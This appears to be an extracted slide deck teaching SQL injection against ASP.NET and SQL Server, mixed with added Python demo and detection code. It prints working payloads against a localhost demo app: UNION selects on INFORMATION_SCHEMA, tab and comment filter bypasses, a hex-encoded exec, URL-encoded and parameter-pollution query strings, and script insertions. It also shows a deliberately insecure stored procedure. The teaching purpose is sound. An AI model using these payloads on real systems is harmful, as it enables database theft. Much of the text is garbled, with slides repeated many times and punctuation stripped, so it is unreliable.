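    return conn.execute(COLUMNS + "where Name like '" + filter_value + "'").fetchall()


def good_proc(conn, filter_value):
    """Mirror of the sp_executesql version: the filter is bound as a value,
    so the engine only ever compares against it and never parses it."""
    return conn.execute(COLUMNS + "where Name like ?", (filter_value,)).fetchall()


if __name__ == "__main__":
    db = setup()
    print("bad_proc :", bad_proc(db, PAYLOAD))    # leaks the catalog
    print("good_proc:", good_proc(db, PAYLOAD))   # []: no name matches the payload
    print("good_proc:", good_proc(db, "%Bikes"))  # the legitimate filter still works
```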
Recap: What To Do
• Parameterize your queries
  – Use SqlParameter to handle input in ASP.NET
  – Use sp_executesql correctly when you do use dynamic SQL
• Understand your data domain
  – Correct data sizes (not too large)
  – Input field has correct length
  – Regular expressions for well-defined field types (e.g. phone number, Social Security Number)
• Blacklists usually don't work, but whitelists can
• Create limited-access accounts for web applications
• Constraints in UI, business objects, and database
  – Defense in depth
  – This isn't really a violation of DRY
  – If I can beat two of your three checks, the third could still stop me
Next Steps
• Automation
  – Havij (most popular, easy GUI)
  – Sqlmap (my favorite)
  – BSQL Hacker (blind SQL injection)
  – BBQSQL (Python-based blind SQL injection)
  – Fast-Track (Metasploit module)
  – Plenty more where this came from
• Really evil stuff
Q&A
Kevin Feasel, feaselkl@gmail.com
Back To The Drawing Board
• Need a slightly less naïve approach to filtering
• Our developer has a stroke of genius: evil hackers need to use "select" + space, whereas our little old ladies would use "select" without a space. We now have a separating equilibrium.
• Problem: you're doing it wrong
• Proof: SHOOOO' UNION select<tab>TABLE_SCHEMA + '.' + TABLE_NAME, 1, 1 from INFORMATION_SCHEMA.TABLES--
  – Yeah, that's a tab (hex 09) between "select" and "TABLE_SCHEMA". Other valid separators: 0A, 0B, 0C, 0D, A0
150 Copy-Pastes Later…
• After adding various permutations of SQL commands + separators…

    declare @shmoo varchar(8000)
    set @shmoo = CAST(0x73656C656374095441424C455F534348454D41202B20272E27202B205441424C455F4E414D45206173204E616D652C20312061732049734163746976652C203120617320536F72744F726465722066726F6D20494E464F524D4154494F4E5F534348454D412E5441424C4553 as varchar(8000))
    exec(@shmoo)
Translating The Varbinary
• select cast('select TABLE_SCHEMA + ''.'' + TABLE_NAME as Name, 1 as IsActive, 1 as SortOrder from INFORMATION_SCHEMA.TABLES' as varbinary(8000))
• Important note: this won't combine data together
  – Varbinary runs are better for insert/update/delete operations
Other Fun Stuff We Can Do
• select CAST('insert into Production.ProductSubcategory(ProductCategoryID, Name, rowguid, ModifiedDate) values(1, ''<a href="http://www.google.com">Hacker Domain</a>'', newid(), current_timestamp)' as varbinary(8000))
  – Add in undesired links. Hint from Heloise: this looks suspiciously like the beginning of a cross-site scripting attack
Other Fun Stuff We Can Do
select CAST('insert into Production.ProductSubcategory(ProductCategoryID, Name, rowguid, ModifiedDate) values(1, ''<script type="text/javascript">alert("A")</script>'', newid(), current_timestamp)' as varbinary(8000))
Querystring Injection
• Helpful table to understand querystring injection

    Hex Code   Character
    09         Tab
    20         Space
    25         %
    27         '
    2B         +
    2C         ,
    2D         -
    2E         .
    3D         =
Querystring Injection
• http://localhost/SQLInjectionWorkbench/QueryDriven.aspx?search=bike%2527%20or%201%3D1%2D%2D
  – Translates to "bike' or 1=1--"
• The way we did the Slightly Less Naïve Stop actually helps us here by preventing some querystring attacks:
  http://localhost/SQLInjectionWorkbench/QueryDriven.aspx?search=bike%2527%20union%20select%20table_schema%2B%27%2E%27%2BTABLE_NAME%20as%20Name%2C1%2C1%20from%20information_schema.tables%2D%2D
  – That "select%20" is equivalent to "select " (the keyword followed by a space), which the filter catches
Querystring Injection
• Injecting other whitespace characters is as easy as %09… or %0A…
• http://localhost/SQLInjectionWorkbench/QueryDriven.aspx?search=prevention%2527%20union%20select%09table_schema%2B%27%2E%27%2BTABLE_NAME%20as%20Name%2C1%2C1%20from%20information_schema.tables%2D%2D
HTTP Parameter Pollution
• In ASP.NET, including a parameter multiple times causes the different entries to be concatenated and separated by commas
• http://localhost/SQLInjectionWorkbench/QueryDriven.aspx?search=36&search=jump&search=street
  – Turns into "36,jump,street" in our search
• This can be used for evil – any guesses how?
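To see the querystring and parameter-pollution payloads from these slides the way the database eventually does, here is an added example (my own code, not the SQL Injection Workbench) in Python: a log-review normalizer that joins repeated parameters the way ASP.NET does, decodes %2527-style double encoding, drops the /* */ comment that swallows the inserted comma, folds the separators from the hex table into one space and unwraps CAST(0x…) literals, then compares the slide's "select + space" filter against a check on that normalized view. The sample query strings are those from the slides; the marker regex, function names and the hex reassembly are assumptions of this example.

```python
"""
Log-review normalizer for the query-string tricks on these slides. Added
example, not the SQL Injection Workbench code: it joins repeated parameters
the way ASP.NET does, decodes %2527-style double encoding, drops the /* */
comment that swallows the inserted comma, folds the separators from the hex
table (09 0A 0B 0C 0D A0) into one space and unwraps CAST(0x...) literals,
then compares the slide's "select + space" filter with a check on that view.
"""
import re
from urllib.parse import parse_qsl, unquote

# The slide's hex literal, reassembled from the deck (constructed sample).
SLIDE_HEX = (
    "73656C656374" "09" "5441424C455F534348454D41"        # select<tab>TABLE_SCHEMA
    "202B20" "272E27" "202B20" "5441424C455F4E414D45"      #  + '.' + TABLE_NAME
    "20617320" "4E616D65" "2C20"                           #  as Name,
    "3120617320" "4973416374697665" "2C20"                 # 1 as IsActive,
    "3120617320" "536F72744F72646572" "2066726F6D20"       # 1 as SortOrder from
    "494E464F524D4154494F4E5F534348454D412E5441424C4553"   # INFORMATION_SCHEMA.TABLES
)

SQL_SEPARATORS = re.compile(r"[\t\n\x0b\x0c\r\xa0 ]+")   # every separator on the slide
BLOCK_COMMENT = re.compile(r"/\*.*?\*/", re.S)
HEX_LITERAL = re.compile(r"0x((?:[0-9A-Fa-f]{2})+)")
NAIVE_FILTER = re.compile(r"select ", re.I)              # the "slightly less naive" check
INJECTION_MARKERS = re.compile(                          # my own, deliberately small, list
    r"(union\s+select|'\s*or\s+\d+\s*=\s*\d+|information_schema|--$)")


def aspnet_join(query_string):
    """Emulate Request.QueryString: repeated keys become one comma-joined value."""
    merged = {}
    for key, value in parse_qsl(query_string, keep_blank_values=True):
        merged[key] = value if key not in merged else merged[key] + "," + value
    return merged


def fully_decode(value, max_rounds=4):
    """Decode until stable (bounded), so %2527 is seen as the quote it becomes."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def decode_hex_literals(text):
    """Replace 0x... literals with the text they CAST to (the @shmoo trick)."""
    return HEX_LITERAL.sub(
        lambda m: bytes.fromhex(m.group(1)).decode("latin-1"), text)


def normalize_sql(text):
    """Strip block comments, unwrap hex, fold separators to one space, lower-case."""
    text = BLOCK_COMMENT.sub("", text)
    text = decode_hex_literals(text)
    return SQL_SEPARATORS.sub(" ", text).strip().lower()


def analyze(query_string, parameter="search"):
    """What the naive filter decides versus what the normalized view shows."""
    value = fully_decode(aspnet_join(query_string).get(parameter, ""))
    normalized = normalize_sql(value)
    return {
        "value": value,
        "naive_blocked": NAIVE_FILTER.search(value) is not None,
        "normalized": normalized,
        "suspicious": INJECTION_MARKERS.search(normalized) is not None,
    }


# Constructed samples: the part after "?" in the slides' URLs.
SAMPLES = {
    "tautology": "search=bike%2527%20or%201%3D1%2D%2D",
    "union_space": "search=bike%2527%20union%20select%20table_schema%2B%27%2E%27%2B"
                   "TABLE_NAME%20as%20Name%2C1%2C1%20from%20information_schema.tables%2D%2D",
    "union_tab": "search=prevention%2527%20union%20select%09table_schema%2B%27%2E%27%2B"
                 "TABLE_NAME%20as%20Name%2C1%2C1%20from%20information_schema.tables%2D%2D",
    "union_hpp": "search=prevention%2527%20union%20select%2F%2A&search=%2A%2F%20table_schema"
                 "%2B%27%2E%27%2BTABLE_NAME%20as%20Name%2C1%2C1%20from%20information_schema.tables%2D%2D",
    "benign_hpp": "search=36&search=jump&search=street",
}

if __name__ == "__main__":
    for name, qs in SAMPLES.items():
        r = analyze(qs)
        print(f"{name:11} naive_blocked={r['naive_blocked']!s:5} "
              f"suspicious={r['suspicious']!s:5} {r['normalized']}")
    print(decode_hex_literals("0x" + SLIDE_HEX))
```

Only the space-separated UNION trips the naive filter; the tab and comment variants pass it and are caught only after normalization, which is the argument for parameterizing rather than filtering.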
bull exec BadProc Filter=SHOOOO
UNION select TABLE_SCHEMA +
+ TABLE_NAME 1 1 from
INFORMATION_SCHEMATABLES--
bull Parameterized queries prevent this from being an issue in ASPNET
Protecting Your Dynamic SPs
bull Use sp_executesql ndash Could also use a combo of QUOTENAME and REPLACE
bull Include the parameter as a parameter inside the sql to run
bull Example declare sql nvarchar(max) set sql = select ProductSubcategory
ID ProductCategoryID
Name from ProductionProductSubcatego
ry where Name like Filter
exec sp_executesql sql NFilter
varchar(200) Filter
bull Once you do this you are completely safe from SQL injection
Recap What To Do
bull Parameterize Your Queries ndash Use SqlParameter to handle input in ASPNet ndash Use sp_executesql correctly when you do use dynamic SQL
bull Understand your data domain ndash Correct data sizes (not too large) ndash Input field has correct length ndash Regular expressions for well-defined field types (eg phone number
Social Security Number) bull Blacklists usually donrsquot work but whitelists can
bull Create limited-access accounts for web applications bull Constraints in UI business objects and database
ndash Defense in depth ndash This isnrsquot really a violation of DRY ndash If I can beat two of your three checks the third could still stop me
Next Steps
bull Automation
ndash Havij (most popular easy GUI)
ndash Sqlmap (my favorite)
ndash BSQL Hacker (blind SQL injection)
ndash BBQSQL (Python-based blind SQL injection)
ndash Fast-Track (Metasploit module)
ndash Plenty more where this came from
bull Really evil stuff
QampA
Kevin Feasel feaselklgmailcom
Querystring Injection
bull Injecting other whitespace characters is as easy as 09hellipor 0Ahellip
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select09table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
HTTP Parameter Pollution
bull In ASPNET including a parameter multiple times causes the different entries to be concatenated and separated by commas
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=36ampsearch=jumpampsearch=street ndash Turns into ldquo36jumpstreetrdquo in our search
bull This can be used for evil ndash Any guesses how
HTTP Parameter Pollution
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select2F2Aampsearch=2A2F20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
ndash 2F2A =
ndash Translates to ldquoselect table_schemahelliprdquo
HTTP Parameter Pollution
bull HTTP Parameter Pollution is something most people donrsquot even think about ndash It doesnrsquot help that different platforms react in different
waysmdashconcatenate ignore all but the last etc
Effects On Different Platforms
httpswwwowasporgimagesbbaAppsecEU09_CarettoniDiPaola_v08pdf
Doing It Right Parameterized Queries
bull The right way to do it
ndash All parameters created using SqlParamter
ndash Not necessary to use stored procedures though in SQL Server this is preferable
bull Stored Procedure-Driven Test not susceptible to SQL injection You are safe from this issue
bull Secure Query-Driven Test not susceptible either
Adding Dynamic SQL Into The Mix
bull Basic insecure dynamic SP bull create procedure BadProc
Filter nvarchar(500)
as
declare sql varchar(250)
set sql = lsquoselect from table where
Name like lsquorsquorsquo + Filter + lsquorsquorsquorsquo
exec(sql)
bull The basic problem is the same as in the query-driven injection example that Filter is not sanitized or parameterized
Attacking Insecure Dynamic SPs
bull Easy to perform attacks on unprotected dynamic stored procedures from SSMS
bull exec BadProc Filter=SHOOOO
UNION select TABLE_SCHEMA +
+ TABLE_NAME 1 1 from
INFORMATION_SCHEMATABLES--
bull Parameterized queries prevent this from being an issue in ASPNET
Protecting Your Dynamic SPs
bull Use sp_executesql ndash Could also use a combo of QUOTENAME and REPLACE
bull Include the parameter as a parameter inside the sql to run
bull Example declare sql nvarchar(max) set sql = select ProductSubcategory
ID ProductCategoryID
Name from ProductionProductSubcatego
ry where Name like Filter
exec sp_executesql sql NFilter
varchar(200) Filter
bull Once you do this you are completely safe from SQL injection
Recap What To Do
bull Parameterize Your Queries ndash Use SqlParameter to handle input in ASPNet ndash Use sp_executesql correctly when you do use dynamic SQL
bull Understand your data domain ndash Correct data sizes (not too large) ndash Input field has correct length ndash Regular expressions for well-defined field types (eg phone number
Social Security Number) bull Blacklists usually donrsquot work but whitelists can
bull Create limited-access accounts for web applications bull Constraints in UI business objects and database
ndash Defense in depth ndash This isnrsquot really a violation of DRY ndash If I can beat two of your three checks the third could still stop me
Next Steps
bull Automation
ndash Havij (most popular easy GUI)
ndash Sqlmap (my favorite)
ndash BSQL Hacker (blind SQL injection)
ndash BBQSQL (Python-based blind SQL injection)
ndash Fast-Track (Metasploit module)
ndash Plenty more where this came from
bull Really evil stuff
QampA
Kevin Feasel feaselklgmailcom
HTTP Parameter Pollution
bull In ASPNET including a parameter multiple times causes the different entries to be concatenated and separated by commas
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=36ampsearch=jumpampsearch=street ndash Turns into ldquo36jumpstreetrdquo in our search
bull This can be used for evil ndash Any guesses how
HTTP Parameter Pollution
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select2F2Aampsearch=2A2F20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
ndash 2F2A =
ndash Translates to ldquoselect table_schemahelliprdquo
HTTP Parameter Pollution
bull HTTP Parameter Pollution is something most people donrsquot even think about ndash It doesnrsquot help that different platforms react in different
waysmdashconcatenate ignore all but the last etc
Effects On Different Platforms
httpswwwowasporgimagesbbaAppsecEU09_CarettoniDiPaola_v08pdf
Doing It Right Parameterized Queries
bull The right way to do it
ndash All parameters created using SqlParamter
ndash Not necessary to use stored procedures though in SQL Server this is preferable
bull Stored Procedure-Driven Test not susceptible to SQL injection You are safe from this issue
bull Secure Query-Driven Test not susceptible either
Adding Dynamic SQL Into The Mix
bull Basic insecure dynamic SP bull create procedure BadProc
Filter nvarchar(500)
as
declare sql varchar(250)
set sql = lsquoselect from table where
Name like lsquorsquorsquo + Filter + lsquorsquorsquorsquo
exec(sql)
bull The basic problem is the same as in the query-driven injection example that Filter is not sanitized or parameterized
Attacking Insecure Dynamic SPs
bull Easy to perform attacks on unprotected dynamic stored procedures from SSMS
bull exec BadProc Filter=SHOOOO
UNION select TABLE_SCHEMA +
+ TABLE_NAME 1 1 from
INFORMATION_SCHEMATABLES--
bull Parameterized queries prevent this from being an issue in ASPNET
Protecting Your Dynamic SPs
bull Use sp_executesql ndash Could also use a combo of QUOTENAME and REPLACE
bull Include the parameter as a parameter inside the sql to run
bull Example declare sql nvarchar(max) set sql = select ProductSubcategory
ID ProductCategoryID
Name from ProductionProductSubcatego
ry where Name like Filter
exec sp_executesql sql NFilter
varchar(200) Filter
bull Once you do this you are completely safe from SQL injection
Recap What To Do
bull Parameterize Your Queries ndash Use SqlParameter to handle input in ASPNet ndash Use sp_executesql correctly when you do use dynamic SQL
bull Understand your data domain ndash Correct data sizes (not too large) ndash Input field has correct length ndash Regular expressions for well-defined field types (eg phone number
Social Security Number) bull Blacklists usually donrsquot work but whitelists can
bull Create limited-access accounts for web applications bull Constraints in UI business objects and database
ndash Defense in depth ndash This isnrsquot really a violation of DRY ndash If I can beat two of your three checks the third could still stop me
Next Steps
bull Automation
ndash Havij (most popular easy GUI)
ndash Sqlmap (my favorite)
ndash BSQL Hacker (blind SQL injection)
ndash BBQSQL (Python-based blind SQL injection)
ndash Fast-Track (Metasploit module)
ndash Plenty more where this came from
bull Really evil stuff
QampA
Kevin Feasel feaselklgmailcom
HTTP Parameter Pollution
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select2F2Aampsearch=2A2F20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
ndash 2F2A =
ndash Translates to ldquoselect table_schemahelliprdquo
HTTP Parameter Pollution
bull HTTP Parameter Pollution is something most people donrsquot even think about ndash It doesnrsquot help that different platforms react in different
waysmdashconcatenate ignore all but the last etc
Effects On Different Platforms
httpswwwowasporgimagesbbaAppsecEU09_CarettoniDiPaola_v08pdf
Doing It Right Parameterized Queries
bull The right way to do it
ndash All parameters created using SqlParamter
ndash Not necessary to use stored procedures though in SQL Server this is preferable
bull Stored Procedure-Driven Test not susceptible to SQL injection You are safe from this issue
bull Secure Query-Driven Test not susceptible either
Adding Dynamic SQL Into The Mix
bull Basic insecure dynamic SP bull create procedure BadProc
Filter nvarchar(500)
as
declare sql varchar(250)
set sql = lsquoselect from table where
Name like lsquorsquorsquo + Filter + lsquorsquorsquorsquo
exec(sql)
bull The basic problem is the same as in the query-driven injection example that Filter is not sanitized or parameterized
Attacking Insecure Dynamic SPs
bull Easy to perform attacks on unprotected dynamic stored procedures from SSMS
bull exec BadProc Filter=SHOOOO
UNION select TABLE_SCHEMA +
+ TABLE_NAME 1 1 from
INFORMATION_SCHEMATABLES--
bull Parameterized queries prevent this from being an issue in ASPNET
Protecting Your Dynamic SPs
bull Use sp_executesql ndash Could also use a combo of QUOTENAME and REPLACE
bull Include the parameter as a parameter inside the sql to run
bull Example declare sql nvarchar(max) set sql = select ProductSubcategory
ID ProductCategoryID
Name from ProductionProductSubcatego
ry where Name like Filter
exec sp_executesql sql NFilter
varchar(200) Filter
bull Once you do this you are completely safe from SQL injection
Recap What To Do
bull Parameterize Your Queries ndash Use SqlParameter to handle input in ASPNet ndash Use sp_executesql correctly when you do use dynamic SQL
bull Understand your data domain ndash Correct data sizes (not too large) ndash Input field has correct length ndash Regular expressions for well-defined field types (eg phone number
Social Security Number) bull Blacklists usually donrsquot work but whitelists can
bull Create limited-access accounts for web applications bull Constraints in UI business objects and database
ndash Defense in depth ndash This isnrsquot really a violation of DRY ndash If I can beat two of your three checks the third could still stop me
Next Steps
bull Automation
ndash Havij (most popular easy GUI)
ndash Sqlmap (my favorite)
ndash BSQL Hacker (blind SQL injection)
ndash BBQSQL (Python-based blind SQL injection)
ndash Fast-Track (Metasploit module)
ndash Plenty more where this came from
bull Really evil stuff
QampA
Kevin Feasel feaselklgmailcom
HTTP Parameter Pollution
bull HTTP Parameter Pollution is something most people donrsquot even think about ndash It doesnrsquot help that different platforms react in different
waysmdashconcatenate ignore all but the last etc
Effects On Different Platforms
httpswwwowasporgimagesbbaAppsecEU09_CarettoniDiPaola_v08pdf
Doing It Right Parameterized Queries
bull The right way to do it
ndash All parameters created using SqlParamter
ndash Not necessary to use stored procedures though in SQL Server this is preferable
bull Stored Procedure-Driven Test not susceptible to SQL injection You are safe from this issue
bull Secure Query-Driven Test not susceptible either
Adding Dynamic SQL Into The Mix
bull Basic insecure dynamic SP bull create procedure BadProc
Filter nvarchar(500)
as
declare sql varchar(250)
set sql = lsquoselect from table where
Name like lsquorsquorsquo + Filter + lsquorsquorsquorsquo
exec(sql)
bull The basic problem is the same as in the query-driven injection example that Filter is not sanitized or parameterized
Attacking Insecure Dynamic SPs
bull Easy to perform attacks on unprotected dynamic stored procedures from SSMS
bull exec BadProc Filter=SHOOOO
UNION select TABLE_SCHEMA +
+ TABLE_NAME 1 1 from
INFORMATION_SCHEMATABLES--
bull Parameterized queries prevent this from being an issue in ASPNET
Protecting Your Dynamic SPs
bull Use sp_executesql ndash Could also use a combo of QUOTENAME and REPLACE
bull Include the parameter as a parameter inside the sql to run
bull Example declare sql nvarchar(max) set sql = select ProductSubcategory
ID ProductCategoryID
Name from ProductionProductSubcatego
ry where Name like Filter
exec sp_executesql sql NFilter
varchar(200) Filter
bull Once you do this you are completely safe from SQL injection
Recap What To Do
bull Parameterize Your Queries ndash Use SqlParameter to handle input in ASPNet ndash Use sp_executesql correctly when you do use dynamic SQL
bull Understand your data domain ndash Correct data sizes (not too large) ndash Input field has correct length ndash Regular expressions for well-defined field types (eg phone number
Social Security Number) bull Blacklists usually donrsquot work but whitelists can
bull Create limited-access accounts for web applications bull Constraints in UI business objects and database
ndash Defense in depth ndash This isnrsquot really a violation of DRY ndash If I can beat two of your three checks the third could still stop me
Next Steps
bull Automation
ndash Havij (most popular easy GUI)
ndash Sqlmap (my favorite)
ndash BSQL Hacker (blind SQL injection)
ndash BBQSQL (Python-based blind SQL injection)
ndash Fast-Track (Metasploit module)
ndash Plenty more where this came from
bull Really evil stuff
QampA
Kevin Feasel feaselklgmailcom
Effects On Different Platforms
httpswwwowasporgimagesbbaAppsecEU09_CarettoniDiPaola_v08pdf
Doing It Right Parameterized Queries
bull The right way to do it
ndash All parameters created using SqlParamter
ndash Not necessary to use stored procedures though in SQL Server this is preferable
bull Stored Procedure-Driven Test not susceptible to SQL injection You are safe from this issue
bull Secure Query-Driven Test not susceptible either
Adding Dynamic SQL Into The Mix
bull Basic insecure dynamic SP bull create procedure BadProc
Filter nvarchar(500)
as
declare sql varchar(250)
set sql = lsquoselect from table where
Name like lsquorsquorsquo + Filter + lsquorsquorsquorsquo
exec(sql)
bull The basic problem is the same as in the query-driven injection example that Filter is not sanitized or parameterized
Attacking Insecure Dynamic SPs
bull Easy to perform attacks on unprotected dynamic stored procedures from SSMS
bull exec BadProc Filter=SHOOOO
UNION select TABLE_SCHEMA +
+ TABLE_NAME 1 1 from
INFORMATION_SCHEMATABLES--
bull Parameterized queries prevent this from being an issue in ASPNET
Protecting Your Dynamic SPs
bull Use sp_executesql ndash Could also use a combo of QUOTENAME and REPLACE
bull Include the parameter as a parameter inside the sql to run
bull Example declare sql nvarchar(max) set sql = select ProductSubcategory
ID ProductCategoryID
Name from ProductionProductSubcatego
ry where Name like Filter
exec sp_executesql sql NFilter
varchar(200) Filter
bull Once you do this you are completely safe from SQL injection
Recap What To Do
bull Parameterize Your Queries ndash Use SqlParameter to handle input in ASPNet ndash Use sp_executesql correctly when you do use dynamic SQL
bull Understand your data domain ndash Correct data sizes (not too large) ndash Input field has correct length ndash Regular expressions for well-defined field types (eg phone number
Social Security Number) bull Blacklists usually donrsquot work but whitelists can
bull Create limited-access accounts for web applications bull Constraints in UI business objects and database
ndash Defense in depth ndash This isnrsquot really a violation of DRY ndash If I can beat two of your three checks the third could still stop me
Next Steps
bull Automation
ndash Havij (most popular easy GUI)
ndash Sqlmap (my favorite)
ndash BSQL Hacker (blind SQL injection)
ndash BBQSQL (Python-based blind SQL injection)
ndash Fast-Track (Metasploit module)
ndash Plenty more where this came from
bull Really evil stuff
QampA
Kevin Feasel feaselklgmailcom
Doing It Right Parameterized Queries
bull The right way to do it
ndash All parameters created using SqlParamter
ndash Not necessary to use stored procedures though in SQL Server this is preferable
bull Stored Procedure-Driven Test not susceptible to SQL injection You are safe from this issue
bull Secure Query-Driven Test not susceptible either
Adding Dynamic SQL Into The Mix
bull Basic insecure dynamic SP bull create procedure BadProc
Filter nvarchar(500)
as
declare sql varchar(250)
set sql = lsquoselect from table where
Name like lsquorsquorsquo + Filter + lsquorsquorsquorsquo
exec(sql)
bull The basic problem is the same as in the query-driven injection example that Filter is not sanitized or parameterized
Attacking Insecure Dynamic SPs
bull Easy to perform attacks on unprotected dynamic stored procedures from SSMS
bull exec BadProc Filter=SHOOOO
UNION select TABLE_SCHEMA +
+ TABLE_NAME 1 1 from
INFORMATION_SCHEMATABLES--
bull Parameterized queries prevent this from being an issue in ASPNET
Protecting Your Dynamic SPs
bull Use sp_executesql ndash Could also use a combo of QUOTENAME and REPLACE
bull Include the parameter as a parameter inside the sql to run
bull Example declare sql nvarchar(max) set sql = select ProductSubcategory
ID ProductCategoryID
Name from ProductionProductSubcatego
ry where Name like Filter
exec sp_executesql sql NFilter
varchar(200) Filter
bull Once you do this you are completely safe from SQL injection
Recap What To Do
bull Parameterize Your Queries ndash Use SqlParameter to handle input in ASPNet ndash Use sp_executesql correctly when you do use dynamic SQL
bull Understand your data domain ndash Correct data sizes (not too large) ndash Input field has correct length ndash Regular expressions for well-defined field types (eg phone number
Social Security Number) bull Blacklists usually donrsquot work but whitelists can
bull Create limited-access accounts for web applications bull Constraints in UI business objects and database
ndash Defense in depth ndash This isnrsquot really a violation of DRY ndash If I can beat two of your three checks the third could still stop me
Next Steps
bull Automation
ndash Havij (most popular easy GUI)
ndash Sqlmap (my favorite)
ndash BSQL Hacker (blind SQL injection)
ndash BBQSQL (Python-based blind SQL injection)
ndash Fast-Track (Metasploit module)
ndash Plenty more where this came from
bull Really evil stuff
QampA
Kevin Feasel feaselklgmailcom
Adding Dynamic SQL Into The Mix
bull Basic insecure dynamic SP bull create procedure BadProc
Filter nvarchar(500)
as
declare sql varchar(250)
set sql = lsquoselect from table where
Name like lsquorsquorsquo + Filter + lsquorsquorsquorsquo
exec(sql)
bull The basic problem is the same as in the query-driven injection example that Filter is not sanitized or parameterized
Attacking Insecure Dynamic SPs
bull Easy to perform attacks on unprotected dynamic stored procedures from SSMS
bull exec BadProc Filter=SHOOOO
UNION select TABLE_SCHEMA +
+ TABLE_NAME 1 1 from
INFORMATION_SCHEMATABLES--
bull Parameterized queries prevent this from being an issue in ASPNET
Protecting Your Dynamic SPs
bull Use sp_executesql ndash Could also use a combo of QUOTENAME and REPLACE
bull Include the parameter as a parameter inside the sql to run
bull Example declare sql nvarchar(max) set sql = select ProductSubcategory
ID ProductCategoryID
Name from ProductionProductSubcatego
ry where Name like Filter
exec sp_executesql sql NFilter
varchar(200) Filter
bull Once you do this you are completely safe from SQL injection
Recap What To Do
bull Parameterize Your Queries ndash Use SqlParameter to handle input in ASPNet ndash Use sp_executesql correctly when you do use dynamic SQL
bull Understand your data domain ndash Correct data sizes (not too large) ndash Input field has correct length ndash Regular expressions for well-defined field types (eg phone number
Social Security Number) bull Blacklists usually donrsquot work but whitelists can
bull Create limited-access accounts for web applications bull Constraints in UI business objects and database
ndash Defense in depth ndash This isnrsquot really a violation of DRY ndash If I can beat two of your three checks the third could still stop me
Next Steps
bull Automation
ndash Havij (most popular easy GUI)
ndash Sqlmap (my favorite)
ndash BSQL Hacker (blind SQL injection)
ndash BBQSQL (Python-based blind SQL injection)
ndash Fast-Track (Metasploit module)
ndash Plenty more where this came from
bull Really evil stuff
QampA
Kevin Feasel feaselklgmailcom
Attacking Insecure Dynamic SPs
bull Easy to perform attacks on unprotected dynamic stored procedures from SSMS
bull exec BadProc Filter=SHOOOO
UNION select TABLE_SCHEMA +
+ TABLE_NAME 1 1 from
INFORMATION_SCHEMATABLES--
bull Parameterized queries prevent this from being an issue in ASPNET
Protecting Your Dynamic SPs
bull Use sp_executesql ndash Could also use a combo of QUOTENAME and REPLACE
bull Include the parameter as a parameter inside the sql to run
bull Example declare sql nvarchar(max) set sql = select ProductSubcategory
ID ProductCategoryID
Name from ProductionProductSubcatego
ry where Name like Filter
exec sp_executesql sql NFilter
varchar(200) Filter
bull Once you do this you are completely safe from SQL injection
Recap What To Do
bull Parameterize Your Queries ndash Use SqlParameter to handle input in ASPNet ndash Use sp_executesql correctly when you do use dynamic SQL
bull Understand your data domain ndash Correct data sizes (not too large) ndash Input field has correct length ndash Regular expressions for well-defined field types (eg phone number
Social Security Number) bull Blacklists usually donrsquot work but whitelists can
bull Create limited-access accounts for web applications bull Constraints in UI business objects and database
ndash Defense in depth ndash This isnrsquot really a violation of DRY ndash If I can beat two of your three checks the third could still stop me
Next Steps
bull Automation
ndash Havij (most popular easy GUI)
ndash Sqlmap (my favorite)
ndash BSQL Hacker (blind SQL injection)
ndash BBQSQL (Python-based blind SQL injection)
ndash Fast-Track (Metasploit module)
ndash Plenty more where this came from
bull Really evil stuff
QampA
Kevin Feasel feaselklgmailcom
Protecting Your Dynamic SPs
bull Use sp_executesql ndash Could also use a combo of QUOTENAME and REPLACE
bull Include the parameter as a parameter inside the sql to run
bull Example declare sql nvarchar(max) set sql = select ProductSubcategory
ID ProductCategoryID
Name from ProductionProductSubcatego
ry where Name like Filter
exec sp_executesql sql NFilter
varchar(200) Filter
bull Once you do this you are completely safe from SQL injection
Recap What To Do
bull Parameterize Your Queries ndash Use SqlParameter to handle input in ASPNet ndash Use sp_executesql correctly when you do use dynamic SQL
bull Understand your data domain ndash Correct data sizes (not too large) ndash Input field has correct length ndash Regular expressions for well-defined field types (eg phone number
Social Security Number) bull Blacklists usually donrsquot work but whitelists can
bull Create limited-access accounts for web applications bull Constraints in UI business objects and database
ndash Defense in depth ndash This isnrsquot really a violation of DRY ndash If I can beat two of your three checks the third could still stop me
Next Steps
bull Automation
ndash Havij (most popular easy GUI)
ndash Sqlmap (my favorite)
ndash BSQL Hacker (blind SQL injection)
ndash BBQSQL (Python-based blind SQL injection)
ndash Fast-Track (Metasploit module)
ndash Plenty more where this came from
bull Really evil stuff
QampA
Kevin Feasel feaselklgmailcom
Recap What To Do
bull Parameterize Your Queries ndash Use SqlParameter to handle input in ASPNet ndash Use sp_executesql correctly when you do use dynamic SQL
bull Understand your data domain ndash Correct data sizes (not too large) ndash Input field has correct length ndash Regular expressions for well-defined field types (eg phone number
Social Security Number) bull Blacklists usually donrsquot work but whitelists can
bull Create limited-access accounts for web applications bull Constraints in UI business objects and database
ndash Defense in depth ndash This isnrsquot really a violation of DRY ndash If I can beat two of your three checks the third could still stop me
Next Steps
bull Automation
ndash Havij (most popular easy GUI)
ndash Sqlmap (my favorite)
ndash BSQL Hacker (blind SQL injection)
ndash BBQSQL (Python-based blind SQL injection)
ndash Fast-Track (Metasploit module)
ndash Plenty more where this came from
bull Really evil stuff
QampA
Kevin Feasel feaselklgmailcom
Next Steps
bull Automation
ndash Havij (most popular easy GUI)
ndash Sqlmap (my favorite)
ndash BSQL Hacker (blind SQL injection)
ndash BBQSQL (Python-based blind SQL injection)
ndash Fast-Track (Metasploit module)
ndash Plenty more where this came from
bull Really evil stuff
QampA
Kevin Feasel feaselklgmailcom